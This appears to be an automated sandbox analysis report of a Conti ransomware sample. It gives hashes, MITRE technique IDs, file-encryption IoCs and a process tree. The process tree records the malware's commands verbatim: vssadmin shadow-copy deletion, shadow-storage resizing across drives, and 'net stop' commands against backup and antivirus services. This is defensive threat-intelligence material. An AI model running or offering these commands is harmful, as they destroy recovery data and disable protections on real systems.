conti | c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4

Analysis

max time kernel
113s
max time network
121s
platform
windows7_x64
resource
win7
submitted
26-08-2020 20:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
Size

101KB
MD5

a200d6c3988d8bf49c305f3e2adee785
SHA1

68dcbf15e926bd239026ed065471d914c85f9c75
SHA256

c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4
SHA512

003efd039edc0f5714853eaaa78e04c6440f707950e9e258ea019ca8573947c7d89b001d711b8e1ab4fb4748af4c488044a4777859f316b91b35672a4da8669e

Score

10^/10

conti ransomware

Malware Config

Signatures

Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.
ransomware conti
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\ConvertFromStop.raw => C:\Users\Admin\Pictures\ConvertFromStop.raw.CONTI	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Pictures\UnprotectSwitch.tiff	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File renamed	C:\Users\Admin\Pictures\SkipRemove.png => C:\Users\Admin\Pictures\SkipRemove.png.CONTI	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File renamed	C:\Users\Admin\Pictures\RevokeSubmit.crw => C:\Users\Admin\Pictures\RevokeSubmit.crw.CONTI	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File renamed	C:\Users\Admin\Pictures\InstallDisable.raw => C:\Users\Admin\Pictures\InstallDisable.raw.CONTI	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File renamed	C:\Users\Admin\Pictures\UnprotectSwitch.tiff => C:\Users\Admin\Pictures\UnprotectSwitch.tiff.CONTI	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe

Drops desktop.ini file(s) 26 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1964	vssadmin.exe
1592	vssadmin.exe
1796	vssadmin.exe
1832	vssadmin.exe
1540	vssadmin.exe
1972	vssadmin.exe
1052	vssadmin.exe
1912	vssadmin.exe
2020	vssadmin.exe
1520	vssadmin.exe
1880	vssadmin.exe
832	vssadmin.exe
1488	vssadmin.exe
1920	vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeBackupPrivilege	1536	vssvc.exe
Token: SeRestorePrivilege	1536	vssvc.exe
Token: SeAuditPrivilege	1536	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1612 wrote to memory of 364	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	24
PID 1612 wrote to memory of 364	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	24
PID 1612 wrote to memory of 364	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	24
PID 1612 wrote to memory of 364	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	24
PID 364 wrote to memory of 1052	364	cmd.exe	26
PID 364 wrote to memory of 1052	364	cmd.exe	26
PID 364 wrote to memory of 1052	364	cmd.exe	26
PID 364 wrote to memory of 1052	364	cmd.exe	26
PID 1612 wrote to memory of 1804	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	28
PID 1612 wrote to memory of 1804	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	28
PID 1612 wrote to memory of 1804	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	28
PID 1612 wrote to memory of 1804	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	28
PID 1804 wrote to memory of 1796	1804	cmd.exe	30
PID 1804 wrote to memory of 1796	1804	cmd.exe	30
PID 1804 wrote to memory of 1796	1804	cmd.exe	30
PID 1804 wrote to memory of 1796	1804	cmd.exe	30
PID 1612 wrote to memory of 1876	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	31
PID 1612 wrote to memory of 1876	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	31
PID 1612 wrote to memory of 1876	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	31
PID 1612 wrote to memory of 1876	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	31
PID 1876 wrote to memory of 1912	1876	cmd.exe	33
PID 1876 wrote to memory of 1912	1876	cmd.exe	33
PID 1876 wrote to memory of 1912	1876	cmd.exe	33
PID 1876 wrote to memory of 1912	1876	cmd.exe	33
PID 1612 wrote to memory of 1932	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	34
PID 1612 wrote to memory of 1932	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	34
PID 1612 wrote to memory of 1932	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	34
PID 1612 wrote to memory of 1932	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	34
PID 1932 wrote to memory of 1964	1932	cmd.exe	36
PID 1932 wrote to memory of 1964	1932	cmd.exe	36
PID 1932 wrote to memory of 1964	1932	cmd.exe	36
PID 1932 wrote to memory of 1964	1932	cmd.exe	36
PID 1612 wrote to memory of 1300	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	37
PID 1612 wrote to memory of 1300	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	37
PID 1612 wrote to memory of 1300	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	37
PID 1612 wrote to memory of 1300	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	37
PID 1300 wrote to memory of 1832	1300	cmd.exe	39
PID 1300 wrote to memory of 1832	1300	cmd.exe	39
PID 1300 wrote to memory of 1832	1300	cmd.exe	39
PID 1300 wrote to memory of 1832	1300	cmd.exe	39
PID 1612 wrote to memory of 1760	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	40
PID 1612 wrote to memory of 1760	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	40
PID 1612 wrote to memory of 1760	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	40
PID 1612 wrote to memory of 1760	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	40
PID 1760 wrote to memory of 1592	1760	cmd.exe	42
PID 1760 wrote to memory of 1592	1760	cmd.exe	42
PID 1760 wrote to memory of 1592	1760	cmd.exe	42
PID 1760 wrote to memory of 1592	1760	cmd.exe	42
PID 1612 wrote to memory of 1640	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	43
PID 1612 wrote to memory of 1640	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	43
PID 1612 wrote to memory of 1640	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	43
PID 1612 wrote to memory of 1640	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	43
PID 1640 wrote to memory of 2020	1640	cmd.exe	45
PID 1640 wrote to memory of 2020	1640	cmd.exe	45
PID 1640 wrote to memory of 2020	1640	cmd.exe	45
PID 1640 wrote to memory of 2020	1640	cmd.exe	45
PID 1612 wrote to memory of 1032	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	46
PID 1612 wrote to memory of 1032	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	46
PID 1612 wrote to memory of 1032	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	46
PID 1612 wrote to memory of 1032	1612	c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe	46
PID 1032 wrote to memory of 832	1032	cmd.exe	48
PID 1032 wrote to memory of 832	1032	cmd.exe	48
PID 1032 wrote to memory of 832	1032	cmd.exe	48
PID 1032 wrote to memory of 832	1032	cmd.exe	48

C:\Users\Admin\AppData\Local\Temp\c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
"C:\Users\Admin\AppData\Local\Temp\c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe"
1⤵
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1612
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:364
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1052
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1804
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1796
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1876
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1932
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1300
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1832
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1760
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2020
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1032
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:832
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  PID:1132
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  PID:324
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  PID:1120
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1540
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  PID:364
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  PID:1792
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:1904
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1972
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Acronis VSS Provider" /y
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\net.exe
    net stop "Acronis VSS Provider" /y
    3⤵
    PID:1828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
      4⤵
      PID:1908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Enterprise Client Service" /y
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\net.exe
    net stop "Enterprise Client Service" /y
    3⤵
    PID:1644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Enterprise Client Service" /y
      4⤵
      PID:1664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "SQLsafe Backup Service" /y
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\net.exe
    net stop "SQLsafe Backup Service" /y
    3⤵
    PID:1660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
      4⤵
      PID:1088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "SQLsafe Filter Service" /y
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\net.exe
    net stop "SQLsafe Filter Service" /y
    3⤵
    PID:1640
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
      4⤵
      PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y
  2⤵
  PID:620
- - C:\Windows\SysWOW64\net.exe
    net stop "Veeam Backup Catalog Data Service" /y
    3⤵
    PID:832
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
      4⤵
      PID:1280
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop AcronisAgent /y
  2⤵
  PID:1272
- - C:\Windows\SysWOW64\net.exe
    net stop AcronisAgent /y
    3⤵
    PID:528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop AcrSch2Svc /y
  2⤵
  PID:1448
- - C:\Windows\SysWOW64\net.exe
    net stop AcrSch2Svc /y
    3⤵
    PID:556
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:1580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop Antivirus /y
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\net.exe
    net stop Antivirus /y
    3⤵
    PID:1068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ARSM /y
  2⤵
  PID:1076
- - C:\Windows\SysWOW64\net.exe
    net stop ARSM /y
    3⤵
    PID:1316
